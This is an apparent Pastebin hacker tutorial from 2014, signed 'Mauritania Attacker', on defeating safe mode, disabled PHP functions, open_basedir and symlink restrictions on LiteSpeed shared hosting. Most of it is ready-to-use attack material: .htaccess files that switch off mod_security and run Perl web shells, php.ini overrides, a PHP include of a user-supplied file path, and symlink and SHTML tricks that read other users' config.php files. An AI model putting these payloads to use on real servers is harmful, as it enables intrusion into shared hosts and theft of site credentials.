Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hello All , Many People asking me how to bypass litespeed servers 2014 ! ?
- well actually there is no bypass avalaible , but i found a simple way to bypass safemode & symlink in any server litespeed 2014.
- and i realized that most of hackers and security researchers who are making tutorial videos online are just liars , because they just show an old bypass , but they do not show us the Kernel Version , year and PHP Version Xd !!! this really sucks -_-
- let's start :)
- First thing you must know that the security is very strong in most of servers 2014 (litespeed) \!/
- So we should be able to do some commands in the server , forget PHP scripts xD !! so when you see "bypass litespeed 2014 PHP scripts"
- just ignore it ;) some hackers are just talking like eating spaghetty °_° they even do not know how a server works -_-
- Here the Solutions To Bypass Safemode & Symlink :
- SAFEMODE :
- 1- Use A python script or perl so you can apply commands correctly 100%
- *Simple Perl Shell + .htaccess
- Rename shell perl to ===> shell.root
- if you have internal server error try to encode your perl shell code with
- MIME::Base64;
- eval(decode_base64('CODE''));
- .htaccess CODE To run Perl Shell :
- Options FollowSymLinks MultiViews Indexes ExecCGI
- AddType application/x-httpd-cgi .root
- AddType application/x-httpd-cgi .root
- AddHandler mod_perl .sh
- AddHandler mod_perl .sh
- AddHandler cgi-script .root
- AddHandler cgi-script .root
- We can also use a php.ini file :
- Safe_mode = OFF
- Safe_mode_gid = OFF
- Disable_Functions = NONE
- Open_basedir = OFF
- suhosin.executor.func.blacklist = NONE
- Let's Take an example of a Litespeed Server 2014 !
- INFOS :
- Server software: LiteSpeed
- PHP : 5.3.28
- Disabled PHP Functions: passthru,system,proc_open,popen,ulti_exec,show_source,eval,symlink
- Open base dir: /home/user:/usr/lib/php:/usr/php4/lib/php:/usr/local/lib/php:/usr/local/php4/lib/php:/tmp
- Safe mode exec dir: /usr/local/php/bin
- *PHP
- if you understand PHP very well , i'm sure you will not have any problem to bypass any server thanks to the PHP version
- as i explained this on 2009:
- PHP <======> Open base_dir
- PHP also = BUG xD !
- Disabled PHP Functions : can be bypassed easily just to help us to do more with Functions :) as we can see in the example we have some PHP Functions Disabled : passthru,system,proc_open,popen,ulti_exec,show_source,eval,symlink
- Solution To Bypass PHP FUNCTIONS :
- .HTACCESS CODE :
- <IfModule mod_security.c>
- SecFilterEngine Off
- SecFilterScanPOST Off
- SecFilterCheckURLEncoding Off
- SecFilterCheckCookieFormat Off
- SecFilterCheckUnicodeEncoding Off
- SecFilterNormalizeCookies Off
- </IfModule>
- <Limit GET POST>
- order deny,allow
- deny from all
- allow from all
- </Limit>
- <Limit PUT DELETE>
- order deny,allow
- deny from all
- </Limit>
- SetEnv PHPRC /home/user/public_html/test/php.ini
- and
- PHP.INI CODE again :
- Safe_mode = OFF
- Safe_mode_gid = OFF
- Disable_Functions = NONE
- Open_basedir = OFF
- suhosin.executor.func.blacklist = NONE
- Another thing wich can help us to bypass the Open Base_dir is ini.php file :
- CODE INI.PHP :
- <?
- echo ini_get(“safe_mode”);
- echo ini_get(“open_basedir”);
- include($_GET["file"]);
- ini_restore(“safe_mode”);
- ini_restore(“open_basedir”);
- echo ini_get(“safe_mode”);
- echo ini_get(“open_basedir”);
- include($_GET["ss"]);
- ?>
- And when you try to retrieve any file don't forget to change extension to another extension not .txt
- like .shtml , .log , .ini , etc........
- ok we done with safemode now let's talk about Bypassing Symlink :
- i will write some .htacess files that can bypass reading files after symlink :
- htaccess1:
- Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any
- htaccess2:
- <Files *.php>
- ForceType application/x-httpd-php4
- </Files>
- htaccess3:
- OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
- Options Indexes FollowSymLinks
- ForceType text/plain
- AddType text/plain .php
- AddType text/plain .html
- AddType text/html .shtml
- AddType txt .php
- Options All
- Options All
- <Files *.php>
- ForceType application/x-httpd-php4
- </Files>
- If you want to bypass Forbidden it's easy just with this .htaccess code :
- DirectoryIndex config.txt
- HeaderName config.txt
- ReadmeName config.txt
- footerName config.txt
- Options all
- ForceType text/plain
- AddType text/plain .php
- AddType text/plain .html
- AddHandler server-parsed .php
- AddHandler txt .php
- you can also try to bypass forbidden from a perl shell :)
- These commands for example :
- ln -s /home/user/public_html/config.php HEADER
- ln -s /home/user/public_html/config.php README
- ln -s /home/user/public_html/config.php FOOTER
- This one is same like Bypassing reading Files as the previous .htaccess but more better from a perl shell :)
- Sometimes also you can bypass reading files with old gold method virtual shtml file read ^_^
- create an .shtml file like "include.shtml" , ghost.ini is the file name you retrieved ^_^
- file CODE :
- <!--#include virtual="ghost.ini" -->
- or php RewriteEngine method for a virtual file
- .htaccess virtual CODE :
- RewriteEngine on
- RewriteRule ^new.gh0st config.txt
- This was just some few infos about Litespeed Server Security
- if you have any problem pm me here : https://www.facebook.com/invincible.man.393 (new account)
- sorry for my bad english :p , i hate school :p xD !!!
- Thanks ^_^
- ./Mauritania Attacker
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement